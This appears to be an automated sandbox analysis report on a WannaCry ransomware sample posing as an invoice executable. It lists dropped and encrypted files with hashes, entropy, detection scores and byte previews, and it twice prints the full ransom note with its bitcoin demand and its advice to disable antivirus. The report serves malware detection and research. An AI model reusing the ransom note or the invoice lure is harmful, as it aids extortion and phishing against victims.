                                                          Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                          C:\Users\user\Documents\@WanaDecryptor@.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):245760
                                                          Entropy (8bit):6.278920408390635
                                                          Encrypted:false
                                                          SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                          MD5:7BF2B57F2A205768755C07F238FB32CC
                                                          SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                          SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                          SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                          • Antivirus: Virustotal, Detection: 90%, Browse
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\Documents\AQRFEVRTGL.pdf

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.80013066252563
                                                          Encrypted:false
                                                          SSDEEP:24:Z8/Sct4O6ep9XRM8DbKr5e5fl+yvVoMHT9PY465aCYNrZoK+:2ShFIhbKrE5fQ4HTR+cbb+
                                                          MD5:B300E58CABF45FF5A8BD9D47CD32CB1B
                                                          SHA1:75AC4DBC04311F52849598DE4A2358CF97445B82
                                                          SHA-256:706966E9CC902908CE965008DA4BE7FAC363A0A5CED0A606CA09ADC85E217698
                                                          SHA-512:BDF5051F0B6D80A3CF5DB438CE4D1B4267B0DBF098DDD514273A7E34E6C6128AB11CE29A4A0FBAEA501B17983DB075BC5CF2226BCBC0BA3FC59C8E0CFAAE6AAC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:3...c+..8.w.[a....}....'.....o.6B./.PYd!1..&..%..c...%.$.)%{...G...S..Jc...mM[.....[tD-..n....\..>...........h~.T.....<......w.......[S...5.A6.h...t0M.G....&.v%..YL)0a...d^........s..6 ."....E..j.3.....W.n...........~d.a...../.)....@...Ueu..B"`.O^....2n..!.5.....R#..d...]..}c."z;X..R(;/...gY..=....h....4a!..F...X...Vf.A.L...4..*../N......v....w......cC....~.(..[..w......).sz.1~..$m.\#".....z..8.qO'R#qq.w..z.k...N!..GxV...P..5.... er6..o..U.....S......tX....x...I.S;..*...4v..A..U.............%=Y....../9.L..r.....I.W....a...u.s.0Y......]...}.......i...z.....i......X......^.',8D..2y........B.t.(.u.c.x....-.0'..r;K.......P......7.Z.X.....S.)..n.*\w..>.?qh`f.S.(.DHV.Y..DQ{..de.}q..~t........> ....[.}...{..EM....x{..".z.CX..9....sH;.^..k "V...rl6....{yG}.N.~.......x5f\=.....$L50._~]#..w.I...%#...{.".I^.*.......s../a....05`v.(].^.....I.r....l.D.?'.Yyt..z)=|...o.-..{.G..>QF...x..eH.[......:..0&U.i...y......_........Eb.0....pqU%k.5...v.O.

                                                          C:\Users\user\Documents\AQRFEVRTGL.pdf.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.846166855944825
                                                          Encrypted:false
                                                          SSDEEP:24:bkYxRTzxm9yB+fQYwvZZojErziqbsRdM+qHQ9iyWvli8Z7MLKuZyBQUJuT5TDa3:bkczq4YwvZ2jErOgC6LHQ9iVv48Z7MLa
                                                          MD5:FFF4719DFD3EF4B04FBA3FAD88337DAE
                                                          SHA1:E28A402128A04276307AB4BCDD7C336B1AADEF90
                                                          SHA-256:A81EAD558D8DC8791FFB0EC685EDA9A1DC83E6E5051F48003C65F36442C3B940
                                                          SHA-512:CFBDF5CA474A9E2F6204E5F498C2C3AAED1584040D0CD18E8167D3B57A9A26DD336AEB81748D91D23FC55A8AFFA4EAAF16AD74673956846AE45ED52E133F725D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....B..b{-.i?.\s8>..[..>.N~...a..;...C.^..V.#R..r.......F.....1....l..l>...y...$\..R.[.I..-...FDnp4.d....9./L.o.l5.RZ3>m..a.o*..6.V...Y\....V...)....Xh.F.........i.2G..Gu.......uo.....:.f..aL.9..g.....V{..,.+.B...!.....i$...gw,....$............H%............z.x..1.=..cm....cy...f$7D5'G.a......x?(./.n2.y.U^oN..ai.L..~p....M=?...~..7...g.d......}#.p....@.......Q.Q......M.......R.+fIq=A.a.)]5...@....n.3%.u.A.... .!.D...t...2..mL3-..o.L/.c5._.. ......wq....F....I[...~.....L..J....\s.7.O.G5..G...n...E......x\W....6Q...O.E.['s8........5.>h.....e...M..Y'...`hh........,.@........%Y..G...e..b-.G.@.P.lVO.NU@d:4.l:..f.g..(....zzvc6.yF.g.M&...|.r.."....t....,Xi..B...l%...d.Y..SE..=.......@.Yj.+4.l,..r._+V.G.*...k$@..JM..R..@.(!w.8.}......7....O^.@5j2..R.,"%W.._yb...5]...Q.y....s.5........%..%..I...9.[QS.. .`m..)....=&.c..:...5....}...e.m-_i.m.1B.H.um.X...s.)D<pj...y....:.k R.....q..z...s.d.#.)|..h.Q...3.}6s..lN...n.>..I}T..|..s...z...a.......

                                                          C:\Users\user\Documents\AQRFEVRTGL.pdf.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.846166855944825
                                                          Encrypted:false
                                                          SSDEEP:24:bkYxRTzxm9yB+fQYwvZZojErziqbsRdM+qHQ9iyWvli8Z7MLKuZyBQUJuT5TDa3:bkczq4YwvZ2jErOgC6LHQ9iVv48Z7MLa
                                                          MD5:FFF4719DFD3EF4B04FBA3FAD88337DAE
                                                          SHA1:E28A402128A04276307AB4BCDD7C336B1AADEF90
                                                          SHA-256:A81EAD558D8DC8791FFB0EC685EDA9A1DC83E6E5051F48003C65F36442C3B940
                                                          SHA-512:CFBDF5CA474A9E2F6204E5F498C2C3AAED1584040D0CD18E8167D3B57A9A26DD336AEB81748D91D23FC55A8AFFA4EAAF16AD74673956846AE45ED52E133F725D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....B..b{-.i?.\s8>..[..>.N~...a..;...C.^..V.#R..r.......F.....1....l..l>...y...$\..R.[.I..-...FDnp4.d....9./L.o.l5.RZ3>m..a.o*..6.V...Y\....V...)....Xh.F.........i.2G..Gu.......uo.....:.f..aL.9..g.....V{..,.+.B...!.....i$...gw,....$............H%............z.x..1.=..cm....cy...f$7D5'G.a......x?(./.n2.y.U^oN..ai.L..~p....M=?...~..7...g.d......}#.p....@.......Q.Q......M.......R.+fIq=A.a.)]5...@....n.3%.u.A.... .!.D...t...2..mL3-..o.L/.c5._.. ......wq....F....I[...~.....L..J....\s.7.O.G5..G...n...E......x\W....6Q...O.E.['s8........5.>h.....e...M..Y'...`hh........,.@........%Y..G...e..b-.G.@.P.lVO.NU@d:4.l:..f.g..(....zzvc6.yF.g.M&...|.r.."....t....,Xi..B...l%...d.Y..SE..=.......@.Yj.+4.l,..r._+V.G.*...k$@..JM..R..@.(!w.8.}......7....O^.@5j2..R.,"%W.._yb...5]...Q.y....s.5........%..%..I...9.[QS.. .`m..)....=&.c..:...5....}...e.m-_i.m.1B.H.um.X...s.)D<pj...y....:.k R.....q..z...s.d.#.)|..h.Q...3.}6s..lN...n.>..I}T..|..s...z...a.......

                                                          C:\Users\user\Documents\HMPPSXQPQV.docx

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:BS image, Version 31555, Quantization 22622, (Decompresses to 16009 words)
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.8164765808707966
                                                          Encrypted:false
                                                          SSDEEP:24:CkHHIoLi25GU1tgkBmefxQwpyTgTHLqybCL1n:C8Hxr1GkAKQ7TgTHOyb0p
                                                          MD5:1333840F9C482FD6057A57A17A3FBBB8
                                                          SHA1:3BFC9BF5B9396639E2F2CCD02CE459D4EDA3DE0E
                                                          SHA-256:A59F15B31F3B134109F7D0AE6B0730D99FFD8419CF232E214D7F0C8C4FFFC751
                                                          SHA-512:FB362F7FF2320172A96580FDBF8B968D2D066F09FFC65DA1D0B60050925C8BC6F5F5F3DF506551BEA54BA0C4545DABDFAA06081D191456DD79AE6AB967DBACBA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.>.8^XC{...gs.W...~+... .^/..V+....A..C....0.y..Z...>N"..6].g..]X....~;..t.fN..=.'..\9.H.h....4.*..\...`.b.....[.....9...X)........k....."D2..#.@....y.G..|....(...\....".}d..).......i\..z.]5.3c^t.T.......:.b@q..)>.4....].<8f..1+..:&i.Ci_eC..".c.w.-.X.l..e)...U...R.4[.[..............`GL.M........LMj.".X.)..[".. ._$y.9..!...,.{n....... ..l..A.k...s.....@+i!...q"..6. >.j/...#.{...d%23.E.L.(.........XF?...4.fr.......4.....v.f.."...)@....I..;...Isn.z.'...X_TCo......P..TS.Xx......qo.........Eaa...P..cJ...~L....CE.(.gE....O..Y&g...u.....xB.2.Rx....I.o(.I/"........OT..F.K..UW.....y.~B.=Y.....+!........_..T....L2.j..b}kXj.2,....{.6>.SO&..kc......t"..yc]....n.b...s{6<...D...g.<...jqN.g.".....WIs...BO$..Qc..Zuqi!........#..y.s....}....+.O})..YP..."..<EnE/.O._JX...[......m...G.,/M..?...R...5.............HQ.A....(.a.R..S.}.9-..ry..q4....#9..._..'..$Xv...Q.......Y.......^.[p..c..J..I..).........n.C.n..?!..".Z..G........A..I.(...h.?...I..`D....

                                                          C:\Users\user\Documents\HMPPSXQPQV.docx.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.852141988318146
                                                          Encrypted:false
                                                          SSDEEP:24:bkK19ncSN7rBAtSGGeYEORAEGZFw3Yp5s4x5g9GVnqPAGSoJoQkt5Fts1bZ:bkOfheYynwws4xi9GVnqPZUQaFWd
                                                          MD5:F50520BCD8A1CB5D57A2934CF6DBEA3A
                                                          SHA1:500D7C857EF8F50B5F026E7282964DE059616C32
                                                          SHA-256:3E4031F8DF6C6D17EDF661510966CBD9EC2CC437F34E68570C352835F0FB8D8A
                                                          SHA-512:22E6B7163CADB67F2E3FCFBEA2084E8771DF1F51743204DE87E9E38DFBF55313C0B9BB3EFE6F07F00CB4EE21D69BF2812282E4CE25F51C6F2A09BDC3C919F135
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....\>mz."...X..sO.......N..9......|N......j.w.....L..@4:..&.....irJ..W.,D.....QQe....l8.XK.u.......W..#.....5G.K.+.p...<.Q!G..;3*.93.#Z.(.m&....L9.5y..H....H.W#.....N}%.b.1[./b......0..w.h.........#y.v.`.(.~@.WC...}l.9.....*...8.A.P..l.`..0.G.C...y7............2S}.)g)=..vR<. I..d.._.....S.. .....{f7.D9.g.&.C..%8f....XP.P.QC..z....L....v.A.~F.>M..H..Nm=..m....*N../`G..b\....BMu?.2i..6.a"...@.U..L*S..5.b..!..w....M.=.xY...w..Mc.|.#qu....U.H......exYD.....!. ...M[+...l.j.H..x..n-...F..x....N.GPSz..*._a0R......XA+.e..{....Cp...Uq......b...&..[4E.....0....c...Z.r_..X..1.....u.^."L.....`z...l.T..0aZD...WX.X...U$..q..X..'..M.k....v...-..vHG.m.4.^D...^..E....W#-:....T:.e..'.}...%..:7....?@*/G....F..B.x.l5.X..%...*7|C!(.9h.3z.Ok.f$Q.....""G.E.K.....z.}...>.....a.....S. 9.7........J..\S.=.t.......D. J...61/4.....7Y.....g.W,..q...vc...j.t.tm.,......i.'....b.E...."....G..7.....!...l..Xt..$l..Ac*..R..T............8m....(y....[.....j..P.%..

                                                          C:\Users\user\Documents\HMPPSXQPQV.docx.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.852141988318146
                                                          Encrypted:false
                                                          SSDEEP:24:bkK19ncSN7rBAtSGGeYEORAEGZFw3Yp5s4x5g9GVnqPAGSoJoQkt5Fts1bZ:bkOfheYynwws4xi9GVnqPZUQaFWd
                                                          MD5:F50520BCD8A1CB5D57A2934CF6DBEA3A
                                                          SHA1:500D7C857EF8F50B5F026E7282964DE059616C32
                                                          SHA-256:3E4031F8DF6C6D17EDF661510966CBD9EC2CC437F34E68570C352835F0FB8D8A
                                                          SHA-512:22E6B7163CADB67F2E3FCFBEA2084E8771DF1F51743204DE87E9E38DFBF55313C0B9BB3EFE6F07F00CB4EE21D69BF2812282E4CE25F51C6F2A09BDC3C919F135
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....\>mz."...X..sO.......N..9......|N......j.w.....L..@4:..&.....irJ..W.,D.....QQe....l8.XK.u.......W..#.....5G.K.+.p...<.Q!G..;3*.93.#Z.(.m&....L9.5y..H....H.W#.....N}%.b.1[./b......0..w.h.........#y.v.`.(.~@.WC...}l.9.....*...8.A.P..l.`..0.G.C...y7............2S}.)g)=..vR<. I..d.._.....S.. .....{f7.D9.g.&.C..%8f....XP.P.QC..z....L....v.A.~F.>M..H..Nm=..m....*N../`G..b\....BMu?.2i..6.a"...@.U..L*S..5.b..!..w....M.=.xY...w..Mc.|.#qu....U.H......exYD.....!. ...M[+...l.j.H..x..n-...F..x....N.GPSz..*._a0R......XA+.e..{....Cp...Uq......b...&..[4E.....0....c...Z.r_..X..1.....u.^."L.....`z...l.T..0aZD...WX.X...U$..q..X..'..M.k....v...-..vHG.m.4.^D...^..E....W#-:....T:.e..'.}...%..:7....?@*/G....F..B.x.l5.X..%...*7|C!(.9h.3z.Ok.f$Q.....""G.E.K.....z.}...>.....a.....S. 9.7........J..\S.=.t.......D. J...61/4.....7Y.....g.W,..q...vc...j.t.tm.,......i.'....b.E...."....G..7.....!...l..Xt..$l..Ac*..R..T............8m....(y....[.....j..P.%..

                                                          C:\Users\user\Documents\HMPPSXQPQV.xlsx

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.813555557528846
                                                          Encrypted:false
                                                          SSDEEP:24:EanHVB7M/oUHw2bFktU4mkYcmgzRgKpEG6YXG:Ean1B7coUHw2bFN/PWJpA
                                                          MD5:5D88D73D86A047F3AB67CC014F7EF224
                                                          SHA1:4F47FB653E30BFC132ADC1CCE2EE82C975B737F0
                                                          SHA-256:E84A1E76D5A599E758CC3B9B96CA8B92E009CA02FE8A2460C47EC7008B605855
                                                          SHA-512:FD9EECFB1D440101995C0A06B054F8B3B52ED0DB3AC6A6D563858C5F5D2B9CE4F56B95B59C531E6DF64DA1FD0832834E5E30A66D2976AC60C513CA9D1E77C034
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:....y..3ok.r.Y.......b~..XxM*.x.O..-.....<...u.....!..|..^1XjR...]h.c.a.g.:.\.`..;F.1...;>......*..CM..26.a...{.{..K*kR.......ea.....zY..../..)...O.u..b._.%.ab../P.Gx....ZF.jD,. ..]l>.p......!..R....w..?..ld..Y..J.0...w....\VA2.Y..k$.......d...vz...8...UR.ET...C.y..n......(...._...<@..A.h.=.l..1AV"?[..>.d.%.b..d...l.0.&....Jq.Q. d.n...lRA.1IJ.W.......9.Wj8.W....K-....Uq...n.j.D.Xi.8l5...5'Y....7.._....z..9w.}.k..V.].)...BQ....S..\&.dQ.5.A..%.. )@..........o.Z1.'D..O...<^|..[.......7g......Y.(&X..8..}........,z....5.}.`..b.JF.+.1.......`U.i...'fig..,V....(d..eKw.W(.X.Q/........i......u6C..C.G...IC.G>....$..2.......v.1..Z......!z.S..|...6<......fN#......|...;.|...U......< {W..B^~.yOq.cF|.!X|Gq.=_.%.B.\..;.....<!.O..x........]vJ^c.c....Q. ....m................c...n..L.>O..4.P.5..3C..^....y....]....|.`F.F.....G.../....U.3..W{.2....Z..c..}{I4.^Ch'.f.........e.}.&k.ZNp\p...W...........H7zY.H.j.PM? ..?<...[....}].....0....5./..(....s.......:.

                                                          C:\Users\user\Documents\HMPPSXQPQV.xlsx.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.846059609082698
                                                          Encrypted:false
                                                          SSDEEP:24:bkr95RGYoYn5yds22KhiblYK+f4LwSFuYihyb0z6Y2/1a+7zJ01Oulkq:bkoLxH4KK+f40ScYi4b0/Y30k2j
                                                          MD5:9A94F5468E5FED81F80B07011A331B82
                                                          SHA1:FE065201F747E1403C99D00903941BE7D54D0E02
                                                          SHA-256:48EA00F330CAF8299848186B411597C95406FB07E54C8F5C1432AE069FB6EE8B
                                                          SHA-512:54F4545A9BD9A044010619FAB6A2CBAF6344DE8A5F4A6431619EA0E7E2A4A4F370A29A5DE9129BA0F5577B1C806AAC544526BE81B9A01CFA04D4C78B2F4F306F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....sr.NV.K.u.5....db.O...p..z.1......6.5.`..F/.F).........t..l....0.C..N>;..4P..Z.{..._..#.Qgy...M...r..()...^@u%..ML@W...#.w..nlG-.t..b.....B.....b..)a.d.U...d.s..R.4..6....X.......D..|i..C....w.@p..+5=.).....}..:q.e5;..Z........c..'.I.................v...j.b...........+g&.O...........PL^..;.t..7m./hl.7c.....".h.;......].A.R...N!.-F..6..N......W.F.4...l.........1...].Q....$N[...o....#...j;z....u...=c..X.p..z.'....L ...U...A.H...WR.'...Jd..h>.9;J..H....EQ'=."....3w.2.2.f./..5P..a....}..... .<c.Z.GyH....E..:`.0x.5...m..ACgi...)8.?V......m...b.Q..R.;.....2."._.*P.....f..........e]..`.Wp.#......"V....bC.>Zk.W...J;..........7W.......J.....^1.N..p..O6.A[j.p...e..0o....H........:.HR.......T.q..qe|.x.............|xI..3V......8.....K.L..z... .U....1...~Y....tz&.:..aD.;.j...../t...W.....tD.6Vsum.P5...`.;..~..Bs.7).V_............zW....)I.......$.....m....lK...."n_...ax....xMF.N.l....]..2..{..'w.k9.$..%...\.F.w[U.]...h......*....

                                                          C:\Users\user\Documents\HMPPSXQPQV.xlsx.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.846059609082698
                                                          Encrypted:false
                                                          SSDEEP:24:bkr95RGYoYn5yds22KhiblYK+f4LwSFuYihyb0z6Y2/1a+7zJ01Oulkq:bkoLxH4KK+f40ScYi4b0/Y30k2j
                                                          MD5:9A94F5468E5FED81F80B07011A331B82
                                                          SHA1:FE065201F747E1403C99D00903941BE7D54D0E02
                                                          SHA-256:48EA00F330CAF8299848186B411597C95406FB07E54C8F5C1432AE069FB6EE8B
                                                          SHA-512:54F4545A9BD9A044010619FAB6A2CBAF6344DE8A5F4A6431619EA0E7E2A4A4F370A29A5DE9129BA0F5577B1C806AAC544526BE81B9A01CFA04D4C78B2F4F306F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....sr.NV.K.u.5....db.O...p..z.1......6.5.`..F/.F).........t..l....0.C..N>;..4P..Z.{..._..#.Qgy...M...r..()...^@u%..ML@W...#.w..nlG-.t..b.....B.....b..)a.d.U...d.s..R.4..6....X.......D..|i..C....w.@p..+5=.).....}..:q.e5;..Z........c..'.I.................v...j.b...........+g&.O...........PL^..;.t..7m./hl.7c.....".h.;......].A.R...N!.-F..6..N......W.F.4...l.........1...].Q....$N[...o....#...j;z....u...=c..X.p..z.'....L ...U...A.H...WR.'...Jd..h>.9;J..H....EQ'=."....3w.2.2.f./..5P..a....}..... .<c.Z.GyH....E..:`.0x.5...m..ACgi...)8.?V......m...b.Q..R.;.....2."._.*P.....f..........e]..`.Wp.#......"V....bC.>Zk.W...J;..........7W.......J.....^1.N..p..O6.A[j.p...e..0o....H........:.HR.......T.q..qe|.x.............|xI..3V......8.....K.L..z... .U....1...~Y....tz&.:..aD.;.j...../t...W.....tD.6Vsum.P5...`.;..~..Bs.7).V_............zW....)I.......$.....m....lK...."n_...ax....xMF.N.l....]..2..{..'w.k9.$..%...\.F.w[U.]...h......*....

                                                          C:\Users\user\Documents\HMPPSXQPQV\@Please_Read_Me@.txt

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):933
                                                          Entropy (8bit):4.711824502619554
                                                          Encrypted:false
                                                          SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                          MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                          SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                          SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
                                                          SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                          C:\Users\user\Documents\HMPPSXQPQV\@WanaDecryptor@.exe.lnk

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Jan 16 09:59:27 2024, mtime=Tue Jan 16 09:59:27 2024, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                          Category:dropped
                                                          Size (bytes):575
                                                          Entropy (8bit):5.140087190146179
                                                          Encrypted:false
                                                          SSDEEP:12:8p9lRXpzYNbBmxCV9nRDTUobjAcIeooldJOdJAmV:8NYfJ/ZAcdDJYJAm
                                                          MD5:B260B5F1DA21A21030CF78AD377BA719
                                                          SHA1:AAF3ED1310E06DDA913464C27E844D68FB0B5E0D
                                                          SHA-256:14F95E9431CBBB8518EAA828AE01EDFE5E464C305DFB319E551AFDA47217E348
                                                          SHA-512:D9E2D44C383ADF16F20D2E704C4D2755F109E84D12E628B1C0A1C288BE5A8E8A0F69AA0A1A372932A240BFA001EB3EB0B82A8BDAE66E720F29E02C93281B6258
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:L..................F.... ...V...kH..d?..kH...X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........{4...%g..kH...k..kH....t.2......J.. .@WANAD~1.EXE..X......0XnW0XnW....S.........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......X...............-.......W............/.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......927537...........hT..CrF.f4... ...0.+d...,....%..hT..CrF.f4... ...0.+d...,....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                          C:\Users\user\Documents\HMPPSXQPQV\HMPPSXQPQV.docx

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.817591288804739
                                                          Encrypted:false
                                                          SSDEEP:24:Twq+0Y2iH+z/mp/pq8dAn/7WCe9lfezot36OuU+PqNA6NZ:Twq+Dr1pBqhDWCe9lfefNU+GX
                                                          MD5:13938768AABA77E4EA2EBA42E056555A
                                                          SHA1:97E63D613F2E5062629D8D2DFD7B9DF51C77D34C
                                                          SHA-256:B21062272ECB251542B342EC0E1460C21F3EDBEA3B8819DDE5A0DB234BB6CAFE
                                                          SHA-512:29FFDDB821ADB7DFA5D2EDBBDD0AB6C308A580807994D14B7C0A93ADA3C58EA8FB4E0D8CAA9C08594867BB5102C5952508D815EECD093927A5883713377508FE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:u.....8...N.4...+..~.7K5.n.iL\*d.*6h...<.g.X.ww.&!.sCsQ.I.......6.9.......1h....c...._8J&1.;D..keB2.....6..v.V.......l{...eY...kn....o$V.].H(r.eY..i.........o..(.B...~..BV.D..u..?.._.L....|.x...o..,...d(.w..v;Q.....U}>..b@pZ.0{..V'...>%-y.|..z{...3.0ID...../..r......Z...+v.- .[..s.@..7....H.#..K...y.Bm...}.{o8.`..J0....EC.:..V..+..rW.Kp..qW...v.'.........>*..2y[n.|f...zY.V< ........t...%.g......v......._.:.].:..V.2.{kq.t.!.I...^K..Ru.Z..3.....3z......5.bF....j+.)....9..q..E.K..n_C.ph..b`.R)......7.....&Y...U....R6....\....._./...G.6..m7.-.$..hS.%x0.:X..{..?.;.j...Z.0.N.b......)..#..{Ju.,i.p*.........b....$....'.\..;.L<...R...E..4..1u..m.....\.N.P.(<.pw..u.[........r%.{.&!Zv...mw:.&..oUwgx.....+U~.hSd.p..N.7.{ &vkl.c..3.a.P2..CA....M4...^.....X.C.9...Q..g..)......zF...C.*...."/.sgq.`=.F....tmc.;.f.:.....}..8.q.6..e.}..ME.."..0^..q..b..>..*...)..4..........s..~9...2.......-;..2R.Q)*`s.[.1.a8Lo.I.q.......WNP...]FLWp.&..)..o...8.T..

                                                          C:\Users\user\Documents\HMPPSXQPQV\HMPPSXQPQV.docx.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.829938513677851
                                                          Encrypted:false
                                                          SSDEEP:24:bkldp3W+dv9XPhb9fenWrm5oORC2RF7Ko+bAUqmOWnKqi3UyaZld4ZOmIJaNBg9:bkliQlXDtrm1RDu7bAx4KqUUJZvOmyI
                                                          MD5:BBEA7305849ED494B4FE84CCBCB149B1
                                                          SHA1:4B6DEB044D7AAA93C9408174C3B1C21378FB8E7D
                                                          SHA-256:FC8765029321F306B0C01B3E02FC5A9E9D55E1C7625B4BA60742610FFECF2B45
                                                          SHA-512:F89A1594860A6AF7343840C82F84082B6DD51CE908AB1817FC61D7C07F26312B5C15B9D3B3C6E95BA2E4C5AA41F37317191AE90957FC3613F31745AD697A69B9
                                                          Malicious:false
                                                          Reputation:unknown
